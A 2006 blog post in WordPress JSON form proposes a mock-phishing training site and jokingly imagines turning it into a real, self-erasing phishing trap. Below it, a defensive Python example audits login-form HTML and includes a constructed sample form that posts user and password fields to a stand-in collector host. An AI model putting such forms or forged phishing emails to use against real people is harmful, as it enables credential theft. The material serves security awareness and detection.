{"id":182,"date":"2006-01-19T00:42:36","date_gmt":"2006-01-18T13:42:36","guid":{"rendered":"http:\/\/www.somethinkodd.com\/oddthinking\/2006\/01\/19\/mock-phish-proposal\/"},"modified":"2006-04-13T01:29:15","modified_gmt":"2006-04-12T14:29:15","slug":"mock-phish-proposal","status":"publish","type":"post","link":"https:\/\/www.somethinkodd.com\/oddthinking\/2006\/01\/19\/mock-phish-proposal\/","title":{"rendered":"Mock-Phish Proposal"},"content":{"rendered":"<h3>Phase A: Using My Powers For Good<\/h3>\n<p>I propose that we produce a Mock-Phish web-site, whose goal is to help security professionals train their co-workers, family and friends to <em>avoid<\/em> falling for phishing scams.<\/p>\n<p>One page will allow the user to nominate a naive computer user (known as the &#8216;mark&#8217;). They will enter the mark&#8217;s basic contact details (e.g. email address and perhaps name), a From address (e.g. security@<em>yourorganisation<\/em>.com, support@<em>yourbank<\/em>.com) and choose from a selection of pre-written phishing text.<\/p>\n<p>The Mock-Phish site will then send an email (with appropriately forged headers) to the mark.<\/p>\n<p>The obfuscated URL inside the email points to a corresponding page of the Mock-Phish site, which invites the user to enter private information (e.g. corporate login name and password, or account number and PIN). It has a submit button.<\/p>\n<p>Sounds ominous, but here&#8217;s the twist: the submit button just does a regular <code>HTTP GET<\/code> and does not forward the entered details. They are simply discarded in the browser (one way to arrange this is to give the form fields no <code>name<\/code> attribute, so the browser has nothing to put in the query string). The submit button simply directs the browser to another page that explains &#8220;You&#8217;ve Been Phished!&#8221;, warns about the dangers of phishing and how to detect it, and explains that, while it might still be prudent to change your password, it hasn&#8217;t really been collected.
<\/p>\n<p>This explanation page would link to a technical explanation page that shows how to read enough of the HTML to convince yourself that your password wasn&#8217;t really stolen (check the form&#8217;s <code>method<\/code> and <code>action<\/code>, whether any field has a <code>name<\/code>, and whether any script touches the fields). It would also link to the first page that lets you mock-phish someone else.<\/p>\n<p>I think this would be a useful tool for CIOs to teach people about the dangers of phishing by showing, rather than telling.<\/p>\n<h3>Phase B: Using My Powers For Evil<\/h3>\n<p>Once this site has been running for a while, is getting lots of hits, and has gained the trust of security professionals, Phase B comes into play.<\/p>\n<p>At random, the <em>first<\/em> time an IP address visits the site, it gets presented with different HTML &#8211; this time a genuine phishing attempt that delivers the secret information into my clutches. It is protected so that once the submit button is pressed, JavaScript runs and changes the DOM to remove all trace of itself. I haven&#8217;t worked out the technical details yet &#8211; I&#8217;ll leave that to my evil JavaScripting henchmen.<\/p>\n<p>Anyone who becomes suspicious will hit &#8220;Back&#8221; and find no sign of the dodgy source, or will revisit the site and, again, find no sign of it.<\/p>\n<p>Oh well. I thought Phase A was a good idea until I came up with Phase B.
I should have realised more quickly that security professionals would not have trusted the site &#8211; well, not if they had ever read Ken Thompson&#8217;s <a href=\"http:\/\/www.argus-systems.com\/feature\/spotm\/trustingtrust\/ReflectionsOnTrustingTrust.html\">Reflections on Trusting Trust<\/a> anyway.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>I propose that we produce a Mock-Phish web-site, whose goal is to help security professionals train their co-workers, family and friends to <em>avoid<\/em> falling for phishing scams.<\/p>\n<p>Once this site has been running for a while, is getting lots of hits, and has gained the trust of security professionals, Phase B comes into play.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_s2mail":"","footnotes":""},"categories":[34,27],"tags":[],"class_list":["post-182","post","type-post","status-publish","format-standard","hentry","category-software-development","category-thoughts-from-the-shower"],"_links":{"self":[{"href":"https:\/\/www.somethinkodd.com\/oddthinking\/wp-json\/wp\/v2\/posts\/182","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.somethinkodd.com\/oddthinking\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.somethinkodd.com\/oddthinking\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.somethinkodd.com\/oddthinking\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.somethinkodd.com\/oddthinking\/wp-json\/wp\/v2\/comments?post=182"}],"version-history":[{"count":0,"href":"https:\/\/www.somethinkodd.com\/oddthinking\/wp-json\/wp\/v2\/posts\/182\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.somethinkodd.com\/oddthinking\/wp-json\/wp\/v2\/media?parent=182"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.somethinkodd.com\/oddthinking\/wp-json\/wp\/v2
\/categories?post=182"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.somethinkodd.com\/oddthinking\/wp-json\/wp\/v2\/tags?post=182"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
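The post's technical explanation page would walk the reader through the login form's markup to show that nothing typed was sent. Here is that check written out as an added Python example; it is not code from the original post or from any Mock-Phish site. It applies the browser rule that only form controls with a `name` attribute are serialised into a submission, reports where each form would send its data and whether any script or event handler could read the fields, and runs over two constructed sample pages, one shaped like Phase A and one shaped like Phase B. The host names `mockphish.example` and `collector.example.net` are invented for the example.

```python
"""Decide from a login form's HTML whether typed values can leave the page.

Added example, not code from the original post. It models the rule the
Mock-Phish design leans on: a submission only serialises controls that
have a `name` attribute, so a GET form of unnamed fields sends nothing but
its bare action URL. Scripts and event handlers are flagged because they
can read fields before any submit. Sample pages and hosts are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class FormAuditor(HTMLParser):
    """Collect each form's method, action and controls, plus any script hooks."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.script_seen = False
        self.event_handlers = []  # (tag, attribute) pairs such as ("input", "onclick")
        self._form = None

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        for key in attrs:
            if key.startswith("on"):
                self.event_handlers.append((tag, key))
        if tag == "script":
            self.script_seen = True
        elif tag == "form":
            self._form = {
                "action": attrs.get("action", ""),
                "method": attrs.get("method", "get").lower() or "get",
                "named": [],    # controls the browser would serialise
                "unnamed": [],  # controls it would silently drop
            }
            self.forms.append(self._form)
        elif tag in ("input", "select", "textarea") and self._form is not None:
            kind = attrs.get("type", "text").lower()
            if kind in ("submit", "button", "reset"):
                return  # buttons carry no user-typed data
            if "name" in attrs:
                self._form["named"].append(attrs["name"])
            else:
                self._form["unnamed"].append(kind)

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def audit_form_html(html, page_host):
    """Return per-form findings and a verdict for a page served from page_host."""
    auditor = FormAuditor()
    auditor.feed(html)
    auditor.close()
    forms = []
    for form in auditor.forms:
        # A relative action stays on the serving host; an absolute one may not.
        target_host = urlsplit(form["action"]).hostname or page_host
        forms.append({
            "method": form["method"],
            "target_host": target_host,
            "cross_origin": target_host != page_host,
            "named_fields": form["named"],
            "unnamed_fields": form["unnamed"],
            "submits_values": bool(form["named"]),
        })
    scripted = auditor.script_seen or bool(auditor.event_handlers)
    leaking = [f for f in forms if f["submits_values"]]
    if leaking:
        targets = ", ".join(
            f"{f['method'].upper()} {f['named_fields']} to {f['target_host']}" for f in leaking
        )
        verdict = "fields are submitted: " + targets
    elif scripted:
        verdict = "no form submits values, but script is present; read it before trusting the page"
    else:
        verdict = "no field is named and no script is present: typed values never leave the browser"
    return {"forms": forms, "scripted": scripted, "verdict": verdict}


# Constructed Phase A page: GET form, no field has a name, action stays on the site.
MOCK_PHISH_PAGE = """
<form method="get" action="/phished.html">
  <label>Login <input type="text"></label>
  <label>Password <input type="password"></label>
  <input type="submit" value="Log in">
</form>
"""

# Constructed Phase B page: same-looking form, but every field is named, the
# action points at another host, and script hooks are present.
REAL_PHISH_PAGE = """
<form method="post" action="https://collector.example.net/drop">
  <label>Login <input type="text" name="user"></label>
  <label>Password <input type="password" name="pass"></label>
  <input type="submit" value="Log in" onclick="return true">
</form>
<script>/* constructed placeholder; any script here can read the fields */</script>
"""

if __name__ == "__main__":
    for label, page in (("Phase A", MOCK_PHISH_PAGE), ("Phase B", REAL_PHISH_PAGE)):
        print(label, "->", audit_form_html(page, "mockphish.example")["verdict"])
```

The check only describes the markup you actually retrieved. Phase B's whole point is that a server can hand a different page to one visit and a clean one to the next, so the copy audited has to be the copy the mark was shown, not a fresh fetch made afterwards.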